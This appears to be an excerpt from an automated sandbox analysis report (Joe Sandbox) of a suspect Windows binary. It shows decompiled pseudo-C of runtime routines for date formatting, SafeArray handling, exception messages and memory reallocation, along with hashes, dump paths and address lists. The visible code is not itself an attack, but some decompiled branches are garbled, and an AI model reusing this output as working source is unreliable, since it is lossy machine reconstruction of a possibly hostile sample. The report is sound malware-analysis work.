                    										__eax = E03269264( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                    										goto L109;
                    									case 8:
                    										L64:
                    										E032692B0(__ebp) = E03269314(__ebp);
                    										__eflags =  *(__ebp - 0xc) - 2;
                    										if( *(__ebp - 0xc) > 2) {
                    											 *(__ebp - 0xc) = 2;
                    										}
                    										__eax =  *(__ebp + 8);
                    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
                    										__edx =  *(__ebp - 0xc);
                    										__eax = E03269264( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                    										goto L109;
                    									case 9:
                    										L67:
                    										__eax = E032692B0(__ebp);
                    										__eflags =  *(__ebp - 0xc) - 1;
                    										if( *(__ebp - 0xc) != 1) {
                    											__eax =  *(__ebp + 8);
                    											__eax =  *0x329d830; // 0x92ea6b8
                    											__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
                    										} else {
                    											__eax =  *(__ebp + 8);
                    											__eax =  *0x329d82c; // 0x92f8ef0
                    											__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
                    										}
                    										goto L109;
                    									case 0xa:
                    										L70:
                    										E032692B0(__ebp) = E03269314(__ebp);
                    										__eflags =  *(__ebp - 0xc) - 3;
                    										if( *(__ebp - 0xc) > 3) {
                    											 *(__ebp - 0xc) = 3;
                    										}
                    										__eax =  *(__ebp + 8);
                    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
                    										__edx =  *(__ebp - 0xc);
                    										__eax = E03269264( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                    										goto L109;
                    									case 0xb:
                    										goto L0;
                    									case 0xc:
                    										L90:
                    										E032692B0(__ebp) =  *(__ebp + 8);
                    										__eax =  *0x329d818; // 0x92f8ed8
                    										__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
                    										__eax = E03269314(__ebp);
                    										__eflags =  *(__ebp - 0x16);
                    										if( *(__ebp - 0x16) != 0) {
                    											L93:
                    											 *(__ebp + 8) = 0x3269d9c;
                    											__edx = 1;
                    											E03269204(1,  *(__ebp + 8)) =  *(__ebp + 8);
                    											__eax =  *0x329d830; // 0x92ea6b8
                    											__eax = E032695E8(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
                    											goto L109;
                    										}
                    										L91:
                    										__eflags =  *(__ebp - 0x18);
                    										if( *(__ebp - 0x18) != 0) {
                    											goto L93;
                    										}
                    										L92:
                    										__eflags =  *(__ebp - 0x1a);
                    										if( *(__ebp - 0x1a) == 0) {
                    											goto L109;
                    										}
                    										goto L93;
                    									case 0xd:
                    										L94:
                    										__eflags =  *0x329d815;
                    										__eflags = __eax - 0x329d815;
                    										 *__edi =  *__edi + __cl;
                    										__eflags =  *(__ebp - 0x75000000) & __dl;
                    									case 0xe:
                    										L97:
                    										__eflags =  *0x329d820;
                    										__eflags = __eax - 0x329d820;
                    										_t128 = __esi + __esi * 2 - 0x75;
                    										 *_t128 =  *(__esi + __esi * 2 - 0x75) + __dh;
                    										__eflags =  *_t128;
                    									case 0xf:
                    										L100:
                    										__esi =  *__edi;
                    										while(1) {
                    											L104:
                    											__eax =  *__edi;
                    											__eflags =  *( *__edi);
                    											if( *( *__edi) == 0) {
                    												break;
                    											}
                    											L105:
                    											 *__edi =  *( *__edi) & 0x000000ff;
                    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
                    											if(__eflags != 0) {
                    												L101:
                    												 *__edi =  *( *__edi) & 0x000000ff;
                    												__eax = __al & 0x000000ff;
                    												asm("bt [0x3289808], eax");
                    												if(__eflags >= 0) {
                    													 *__edi =  *__edi + 1;
                    													__eflags =  *__edi;
                    												} else {
                    													__eax =  *__edi;
                    													 *__edi = E0326BAC0( *__edi);
                    												}
                    												continue;
                    											}
                    											break;
                    										}
                    										L106:
                    										__eax =  *(__ebp + 8);
                    										__edx =  *__edi;
                    										__edx =  *__edi - __esi;
                    										__esi = E03269204(__edx,  *(__ebp + 8));
                    										__eax =  *__edi;
                    										__eflags =  *__eax;
                    										if( *__eax != 0) {
                    											 *__edi =  *__edi + 1;
                    										}
                    										goto L109;
                    								}
                    							} else {
                    								__eflags = _t220 - 0x4d;
                    								if(_t220 == 0x4d) {
                    									__eflags =  *(_t264 - 0x1e) - 0x48;
                    									if( *(_t264 - 0x1e) == 0x48) {
                    										_t220 = 0x4e;
                    									}
                    								}
                    								L9:
                    								 *(_t264 - 0x1e) = _t220;
                    								goto L10;
                    							}
                    						} else {
                    							E03269204(E0326BAA0( *_t261),  *((intOrPtr*)(_t264 + 8)));
                    							 *_t261 = E0326BAC0( *_t261);
                    							 *(_t264 - 0x1e) = 0x20;
                    							continue;
                    						}
                    					}
                    					 *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) - 0x108)) - 1;
                    					_pop(_t258);
                    					 *[fs:eax] = _t258;
                    					_push(E03269D73);
                    					return E032644C4(_t264 - 0x2c, 2);
                    				}
                    			}

















                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID: A/P$AAA$AAAA$AM/PM$AMPM
                    • API String ID: 0-3831542625
                    • Opcode ID: c2f8d2f62c549c248dc81065a10dd44ffc86c4f43021e14631183279755377ef
                    • Instruction ID: 81602b89b5465e02c94536d93f0188c2f0374caecceb31113b02c3e2ac24e573
                    • Opcode Fuzzy Hash: c2f8d2f62c549c248dc81065a10dd44ffc86c4f43021e14631183279755377ef
                    • Instruction Fuzzy Hash: 79418C796342059FEB41FB18D804BAE73E9AF09350F508066E5098F292DFB9DDC28B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID: +$-$-$0$9
                    • API String ID: 0-893461730
                    • Opcode ID: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
                    • Instruction ID: 948409d249735f1f91d1d0af05ebe55d54606aafa292790f73dea31d0e9a9b95
                    • Opcode Fuzzy Hash: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
                    • Instruction Fuzzy Hash: B0F0AF167B622E5EFF3AC42ECC403B6B78F9B822A1F1C846798C1C6241D5A9898182D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0326E1CC(signed short* __eax) {
                    				char _v260;
                    				char _v768;
                    				char _v772;
                    				signed short* _v776;
                    				signed short* _v780;
                    				char _v784;
                    				signed int _v788;
                    				char _v792;
                    				intOrPtr* _v796;
                    				signed char _t43;
                    				intOrPtr* _t60;
                    				void* _t79;
                    				void* _t81;
                    				void* _t84;
                    				void* _t85;
                    				intOrPtr* _t92;
                    				void* _t96;
                    				char* _t97;
                    				void* _t98;
                    
                    				_v776 = __eax;
                    				if((_v776[0] & 0x00000020) == 0) {
                    					E0326E014(0x80070057);
                    				}
                    				_t43 =  *_v776 & 0x0000ffff;
                    				if((_t43 & 0x00000fff) == 0xc) {
                    					if((_t43 & 0x00000040) == 0) {
                    						_v780 = _v776[4];
                    					} else {
                    						_v780 =  *(_v776[4]);
                    					}
                    					_v788 =  *_v780 & 0x0000ffff;
                    					_t79 = _v788 - 1;
                    					if(_t79 >= 0) {
                    						_t85 = _t79 + 1;
                    						_t96 = 0;
                    						_t97 =  &_v772;
                    						do {
                    							_v796 = _t97;
                    							_push(_v796 + 4);
                    							_t22 = _t96 + 1; // 0x1
                    							_push(_v780);
                    							L0326D234();
                    							E0326E014(_v780);
                    							_push( &_v784);
                    							_t25 = _t96 + 1; // 0x1
                    							_push(_v780);
                    							L0326D23C();
                    							E0326E014(_v780);
                    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                    							_t96 = _t96 + 1;
                    							_t97 = _t97 + 8;
                    							_t85 = _t85 - 1;
                    						} while (_t85 != 0);
                    					}
                    					_t81 = _v788 - 1;
                    					if(_t81 >= 0) {
                    						_t84 = _t81 + 1;
                    						_t60 =  &_v768;
                    						_t92 =  &_v260;
                    						do {
                    							 *_t92 =  *_t60;
                    							_t92 = _t92 + 4;
                    							_t60 = _t60 + 8;
                    							_t84 = _t84 - 1;
                    						} while (_t84 != 0);
                    						do {
                    							goto L12;
                    						} while (E0326E170(_t83, _t98) != 0);
                    						goto L15;
                    					}
                    					L12:
                    					_t83 = _v788 - 1;
                    					if(E0326E140(_v788 - 1, _t98) != 0) {
                    						_push( &_v792);
                    						_push( &_v260);
                    						_push(_v780);
                    						L0326D244();
                    						E0326E014(_v780);
                    						E0326E3C4(_v792);
                    					}
                    				}
                    				L15:
                    				_push(_v776);
                    				L0326CDCC();
                    				return E0326E014(_v776);
                    			}























                    APIs
                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0326E27B
                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0326E297
                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0326E30E
                    • VariantClear.OLEAUT32(?), ref: 0326E337
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: ArraySafe$Bound$ClearIndexVariant
                    • String ID:
                    • API String ID: 920484758-0
                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                    • Instruction ID: 33e3f589679e819a86a178bb566128554318f0ad29f63d1d88186ed430a24978
                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                    • Instruction Fuzzy Hash: 6D413B79A1072E9FCB61DF58CD90BD9B3BDAF48600F0541D5E649AB211DA70AFC18F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0326AD20(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				char _v273;
                    				char _v534;
                    				char _v790;
                    				struct _MEMORY_BASIC_INFORMATION _v820;
                    				char _v824;
                    				intOrPtr _v828;
                    				char _v832;
                    				intOrPtr _v836;
                    				char _v840;
                    				intOrPtr _v844;
                    				char _v848;
                    				char* _v852;
                    				char _v856;
                    				char _v860;
                    				char _v1116;
                    				void* __edi;
                    				struct HINSTANCE__* _t40;
                    				intOrPtr _t51;
                    				struct HINSTANCE__* _t53;
                    				void* _t69;
                    				void* _t73;
                    				intOrPtr _t74;
                    				intOrPtr _t83;
                    				intOrPtr _t86;
                    				intOrPtr* _t87;
                    				void* _t93;
                    
                    				_t93 = __fp0;
                    				_v8 = __ecx;
                    				_t73 = __edx;
                    				_t87 = __eax;
                    				VirtualQuery(__edx,  &_v820, 0x1c);
                    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                    					_t40 =  *0x329d7f8; // 0x3260000
                    					GetModuleFileNameA(_t40,  &_v534, 0x105);
                    					_v12 = E0326AD14(_t73);
                    				} else {
                    					_v12 = _t73 - _v820.AllocationBase;
                    				}
                    				E03268070( &_v273, 0x104, E0326BC10( &_v534, 0x5c) + 1);
                    				_t74 = 0x326aea0;
                    				_t86 = 0x326aea0;
                    				_t83 =  *0x3266a8c; // 0x3266ad8
                    				if(E03263850(_t87, _t83) != 0) {
                    					_t74 = E03264964( *((intOrPtr*)(_t87 + 4)));
                    					_t69 = E03268048(_t74, 0x326aea0);
                    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                    						_t86 = 0x326aea4;
                    					}
                    				}
                    				_t51 =  *0x329a980; // 0x3266874
                    				_t16 = _t51 + 4; // 0xffe9
                    				_t53 =  *0x329d7f8; // 0x3260000
                    				LoadStringA(E03265874(_t53),  *_t16,  &_v790, 0x100);
                    				E0326363C( *_t87,  &_v1116);
                    				_v860 =  &_v1116;
                    				_v856 = 4;
                    				_v852 =  &_v273;
                    				_v848 = 6;
                    				_v844 = _v12;
                    				_v840 = 5;
                    				_v836 = _t74;
                    				_v832 = 6;
                    				_v828 = _t86;
                    				_v824 = 6;
                    				E03268590(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                    				return E03268048(_v8, _t86);
                    			}

                    APIs
                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0326AD3D
                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0326AD61
                    • GetModuleFileNameA.KERNEL32(03260000,?,00000105), ref: 0326AD7C
                    • LoadStringA.USER32 ref: 0326AE12
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: FileModuleName$LoadQueryStringVirtual
                    • String ID:
                    • API String ID: 3990497365-0
                    • Opcode ID: 2afbc080738fe6b32016206b41b7e055c99294ad2eecdf1e13519c9448dc6602
                    • Instruction ID: a8c28c4d8df65952189f3ad1b13f99902abc808509b534a2eb3e78bf77773bb0
                    • Opcode Fuzzy Hash: 2afbc080738fe6b32016206b41b7e055c99294ad2eecdf1e13519c9448dc6602
                    • Instruction Fuzzy Hash: 81410CB5A503589BDB21EB68DC84BDEB7FCAF08205F0440EAA548EB251D7B49FC48F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0326AD1E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				char _v273;
                    				char _v534;
                    				char _v790;
                    				struct _MEMORY_BASIC_INFORMATION _v820;
                    				char _v824;
                    				intOrPtr _v828;
                    				char _v832;
                    				intOrPtr _v836;
                    				char _v840;
                    				intOrPtr _v844;
                    				char _v848;
                    				char* _v852;
                    				char _v856;
                    				char _v860;
                    				char _v1116;
                    				void* __edi;
                    				struct HINSTANCE__* _t40;
                    				intOrPtr _t51;
                    				struct HINSTANCE__* _t53;
                    				void* _t69;
                    				void* _t74;
                    				intOrPtr _t75;
                    				intOrPtr _t85;
                    				intOrPtr _t89;
                    				intOrPtr* _t92;
                    				void* _t105;
                    
                    				_v8 = __ecx;
                    				_t74 = __edx;
                    				_t92 = __eax;
                    				VirtualQuery(__edx,  &_v820, 0x1c);
                    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                    					_t40 =  *0x329d7f8; // 0x3260000
                    					GetModuleFileNameA(_t40,  &_v534, 0x105);
                    					_v12 = E0326AD14(_t74);
                    				} else {
                    					_v12 = _t74 - _v820.AllocationBase;
                    				}
                    				E03268070( &_v273, 0x104, E0326BC10( &_v534, 0x5c) + 1);
                    				_t75 = 0x326aea0;
                    				_t89 = 0x326aea0;
                    				_t85 =  *0x3266a8c; // 0x3266ad8
                    				if(E03263850(_t92, _t85) != 0) {
                    					_t75 = E03264964( *((intOrPtr*)(_t92 + 4)));
                    					_t69 = E03268048(_t75, 0x326aea0);
                    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                    						_t89 = 0x326aea4;
                    					}
                    				}
                    				_t51 =  *0x329a980; // 0x3266874
                    				_t16 = _t51 + 4; // 0xffe9
                    				_t53 =  *0x329d7f8; // 0x3260000
                    				LoadStringA(E03265874(_t53),  *_t16,  &_v790, 0x100);
                    				E0326363C( *_t92,  &_v1116);
                    				_v860 =  &_v1116;
                    				_v856 = 4;
                    				_v852 =  &_v273;
                    				_v848 = 6;
                    				_v844 = _v12;
                    				_v840 = 5;
                    				_v836 = _t75;
                    				_v832 = 6;
                    				_v828 = _t89;
                    				_v824 = 6;
                    				E03268590(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                    				return E03268048(_v8, _t89);
                    			}

                    APIs
                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0326AD3D
                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0326AD61
                    • GetModuleFileNameA.KERNEL32(03260000,?,00000105), ref: 0326AD7C
                    • LoadStringA.USER32 ref: 0326AE12
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: FileModuleName$LoadQueryStringVirtual
                    • String ID:
                    • API String ID: 3990497365-0
                    • Opcode ID: 3219fd657536eec837fdbde02e09f2f3193f14ab3f8177d9543c0b8e96a3e725
                    • Instruction ID: b31467b21076f41837f201d4b3adb936081f53e809c98010b7e54d8b0a72e7af
                    • Opcode Fuzzy Hash: 3219fd657536eec837fdbde02e09f2f3193f14ab3f8177d9543c0b8e96a3e725
                    • Instruction Fuzzy Hash: 09411EB5A503589BDB21EB68DC84BDAB7FCAF08205F0440E9A548EB251D7B49FC48F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E03261C6C(signed int __eax, signed int __edx, void* __edi) {
                    				signed int _t58;
                    				signed int _t73;
                    				signed int _t80;
                    				signed int _t86;
                    				signed int _t94;
                    				signed int _t100;
                    				void* _t102;
                    				signed int _t111;
                    				signed int _t119;
                    				signed int _t125;
                    				signed int _t131;
                    				signed int _t133;
                    				signed int _t136;
                    				intOrPtr _t139;
                    				void* _t141;
                    				signed int _t143;
                    				signed int _t145;
                    				unsigned int _t146;
                    				signed int _t153;
                    				unsigned int _t154;
                    				intOrPtr _t157;
                    				void* _t160;
                    				intOrPtr _t168;
                    				intOrPtr _t170;
                    				signed int _t173;
                    				signed int _t174;
                    				signed int _t175;
                    				void* _t182;
                    				unsigned int _t184;
                    				signed int _t190;
                    				signed int _t193;
                    				signed int _t195;
                    				signed int _t196;
                    				signed int _t198;
                    				void* _t202;
                    				signed int _t203;
                    				signed int _t204;
                    				void* _t205;
                    				signed int _t208;
                    
                    				_t181 = __edi;
                    				_t166 = __edx;
                    				_t145 =  *(__eax - 4);
                    				_t196 = __eax;
                    				if((_t145 & 0x00000007) != 0) {
                    					__eflags = _t145 & 0x00000005;
                    					if((_t145 & 0x00000005) != 0) {
                    						__eflags = _t145 & 0x00000003;
                    						if((_t145 & 0x00000003) != 0) {
                    							__eflags = 0;
                    							return 0;
                    						} else {
                    							_t146 = _t145 - 0x18;
                    							__eflags = __edx - _t146;
                    							if(__edx <= _t146) {
                    								__eflags = __edx - _t146 >> 1;
                    								if(__edx < _t146 >> 1) {
                    									_t131 = __edx;
                    									_t58 = E03261724(__edx);
                    									__eflags = _t58;
                    									if(_t58 == 0) {
                    										goto L61;
                    									} else {
                    										__eflags = _t131 - 0x40a2c;
                    										if(_t131 > 0x40a2c) {
                    											 *((intOrPtr*)(_t58 - 8)) = _t131;
                    										}
                    										E032614A4(_t196, _t131, _t58);
                    										E03261A8C(_t196, _t181);
                    										return _t58;
                    									}
                    								} else {
                    									 *((intOrPtr*)(__eax - 8)) = __edx;
                    									return __eax;
                    								}
                    							} else {
                    								asm("adc eax, 0xffffffff");
                    								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
                    								_push(__edx);
                    								_t58 = E03261724((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
                    								_pop(_t168);
                    								__eflags = _t58;
                    								if(_t58 != 0) {
                    									__eflags = _t133 - 0x40a2c;
                    									if(_t133 > 0x40a2c) {
                    										 *((intOrPtr*)(_t58 - 8)) = _t168;
                    									}
                    									E03261474(_t196,  *((intOrPtr*)(_t196 - 8)), _t58);
                    									E03261A8C(_t196, _t181);
                    									return _t58;
                    								}
                    								L61:
                    								return _t58;
                    							}
                    						}
                    					} else {
                    						_t153 = _t145 & 0xfffffff0;
                    						_push(__edi);
                    						_t182 = _t153 + __eax;
                    						_t154 = _t153 - 4;
                    						_t136 = _t145 & 0x0000000f;
                    						__eflags = __edx - _t154;
                    						if(__edx > _t154) {
                    							_t73 =  *(_t182 - 4);
                    							__eflags = _t73 & 0x00000001;
                    							if((_t73 & 0x00000001) == 0) {
                    								L51:
                    								asm("adc edi, 0xffffffff");
                    								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
                    								_t184 = _t154;
                    								_t80 = E03261724(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
                    								_t170 = _t166;
                    								__eflags = _t80;
                    								if(_t80 == 0) {
                    									goto L49;
                    								} else {
                    									__eflags = _t198 - 0x40a2c;
                    									if(_t198 > 0x40a2c) {
                    										 *((intOrPtr*)(_t80 - 8)) = _t170;
                    									}
                    									E03261474(_t196, _t184, _t80);
                    									E03261A8C(_t196, _t184);
                    									return _t80;
                    								}
                    							} else {
                    								_t86 = _t73 & 0xfffffff0;
                    								_t202 = _t154 + _t86;
                    								__eflags = __edx - _t202;
                    								if(__edx > _t202) {
                    									goto L51;
                    								} else {
                    									__eflags =  *0x329b04d;
                    									if(__eflags == 0) {
                    										L42:
                    										__eflags = _t86 - 0xb30;
                    										if(_t86 >= 0xb30) {
                    											E032614C0(_t182);
                    											_t166 = _t166;
                    											_t154 = _t154;
                    										}
                    										asm("adc edi, 0xffffffff");
                    										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                    										_t173 = _t202 + 4 - _t94;
                    										__eflags = _t173;
                    										if(_t173 > 0) {
                    											 *(_t196 + _t202 - 4) = _t173;
                    											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
                    											_t203 = _t94;
                    											__eflags = _t173 - 0xb30;
                    											if(_t173 >= 0xb30) {
                    												__eflags = _t94 + _t196;
                    												E03261500(_t94 + _t196, _t154, _t173);
                    											}
                    										} else {
                    											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7;
                    											_t203 = _t202 + 4;
                    										}
                    										_t204 = _t203 | _t136;
                    										__eflags = _t204;
                    										 *(_t196 - 4) = _t204;
                    										 *0x329b718 = 0;
                    										_t80 = _t196;
                    										L49:
                    										return _t80;
                    									} else {
                    										while(1) {
                    											asm("lock cmpxchg [0x329b718], ah");
                    											if(__eflags == 0) {
                    												break;
                    											}
                    											Sleep(0);
                    											_t166 = _t166;
                    											_t154 = _t154;
                    											asm("lock cmpxchg [0x329b718], ah");
                    											if(__eflags != 0) {
                    												Sleep(0xa);
                    												_t166 = _t166;
                    												_t154 = _t154;
                    												continue;
                    											}
                    											break;
                    										}
                    										_t136 = 0x0000000f &  *(_t196 - 4);
                    										_t100 =  *(_t182 - 4);
                    										__eflags = _t100 & 0x00000001;
                    										if((_t100 & 0x00000001) == 0) {
                    											L50:
                    											 *0x329b718 = 0;
                    											goto L51;
                    										} else {
                    											_t86 = _t100 & 0xfffffff0;
                    											_t202 = _t154 + _t86;
                    											__eflags = _t166 - _t202;
                    											if(_t166 > _t202) {
                    												goto L50;
                    											} else {
                    												goto L42;
                    											}
                    										}
                    									}
                    								}
                    							}
                    						} else {
                    							_t205 = __edx + __edx;
                    							__eflags = _t205 - _t154;
                    							if(_t205 < _t154) {
                    								__eflags = __edx - 0xb2c;
                    								if(__edx >= 0xb2c) {
                    									L19:
                    									_t16 = _t166 + 0xd3; // 0xbff
                    									_t208 = (_t16 & 0xffffff00) + 0x30;
                    									_t157 = _t154 + 4 - _t208;
                    									__eflags =  *0x329b04d;
                    									if(__eflags != 0) {
                    										while(1) {
                    											asm("lock cmpxchg [0x329b718], ah");
                    											if(__eflags == 0) {
                    												break;
                    											}
                    											Sleep(0);
                    											_t157 = _t157;
                    											asm("lock cmpxchg [0x329b718], ah");
                    											if(__eflags != 0) {
                    												Sleep(0xa);
                    												_t157 = _t157;
                    												continue;
                    											}
                    											break;
                    										}
                    										_t136 = 0x0000000f &  *(_t196 - 4);
                    										__eflags = 0xf;
                    									}
                    									 *(_t196 - 4) = _t136 | _t208;
                    									_t139 = _t157;
                    									_t174 =  *(_t182 - 4);
                    									__eflags = _t174 & 0x00000001;
                    									if((_t174 & 0x00000001) != 0) {
                    										_t102 = _t182;
                    										_t175 = _t174 & 0xfffffff0;
                    										_t139 = _t139 + _t175;
                    										_t182 = _t182 + _t175;
                    										__eflags = _t175 - 0xb30;
                    										if(_t175 >= 0xb30) {
                    											E032614C0(_t102);
                    										}
                    									} else {
                    										 *(_t182 - 4) = _t174 | 0x00000008;
                    									}
                    									 *((intOrPtr*)(_t182 - 8)) = _t139;
                    									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
                    									__eflags = _t139 - 0xb30;
                    									if(_t139 >= 0xb30) {
                    										E03261500(_t196 + _t208, _t157, _t139);
                    									}
                    									 *0x329b718 = 0;
                    									return _t196;
                    								} else {
                    									__eflags = _t205 - 0xb2c;
                    									if(_t205 < 0xb2c) {
                    										_t190 = __edx;
                    										_t111 = E03261724(__edx);
                    										__eflags = _t111;
                    										if(_t111 != 0) {
                    											E032614A4(_t196, _t190, _t111);
                    											E03261A8C(_t196, _t190);
                    										}
                    										return _t111;
                    									} else {
                    										_t166 = 0xb2c;
                    										goto L19;
                    									}
                    								}
                    							} else {
                    								return __eax;
                    							}
                    						}
                    					}
                    				} else {
                    					_t141 =  *_t145;
                    					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
                    					if(_t160 < __edx) {
                    						_push(__edi);
                    						_t193 = __edx;
                    						asm("adc eax, 0xffffffff");
                    						_t119 = E03261724((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
                    						__eflags = _t119;
                    						if(_t119 != 0) {
                    							__eflags = _t193 - 0x40a2c;
                    							if(_t193 > 0x40a2c) {
                    								 *((intOrPtr*)(_t119 - 8)) = _t193;
                    							}
                    							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
                    							_t195 = _t119;
                    							 *((intOrPtr*)(_t141 + 0x1c))();
                    							E03261A8C(_t196, _t195);
                    							_t119 = _t195;
                    						}
                    						return _t119;
                    					} else {
                    						if(0x40 + __edx * 4 < _t160) {
                    							_t143 = __edx;
                    							_t125 = E03261724(__edx);
                    							__eflags = _t125;
                    							if(_t125 != 0) {
                    								E032614A4(_t196, _t143, _t125);
                    								E03261A8C(_t196, __edi);
                    								return _t125;
                    							}
                    							return _t125;
                    						} else {
                    							return __eax;
                    						}
                    					}
                    				}
                    			}
                    0x03261e78
                    0x03261e79
                    0x00000000
                    0x03261e79
                    0x00000000
                    0x03261e6d
                    0x03261e81
                    0x03261e84
                    0x03261e87
                    0x03261e89
                    0x03261f09
                    0x03261f09
                    0x00000000
                    0x03261e8b
                    0x03261e8b
                    0x03261e8e
                    0x03261e91
                    0x03261e93
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x03261e93
                    0x03261e89
                    0x03261e44
                    0x03261e37
                    0x03261d25
                    0x03261d25
                    0x03261d28
                    0x03261d2a
                    0x03261d34
                    0x03261d3a
                    0x03261d4d
                    0x03261d4d
                    0x03261d59
                    0x03261d5f
                    0x03261d61
                    0x03261d68
                    0x03261d6a
                    0x03261d6f
                    0x03261d77
                    0x00000000
                    0x00000000
                    0x03261d7c
                    0x03261d81
                    0x03261d87
                    0x03261d8f
                    0x03261d94
                    0x03261d99
                    0x00000000
                    0x03261d99
                    0x00000000
                    0x03261d8f
                    0x03261da1
                    0x03261da1
                    0x03261da1
                    0x03261da6
                    0x03261da9
                    0x03261dab
                    0x03261dae
                    0x03261db1
                    0x03261dbc
                    0x03261dbe
                    0x03261dc1
                    0x03261dc3
                    0x03261dc5
                    0x03261dcb
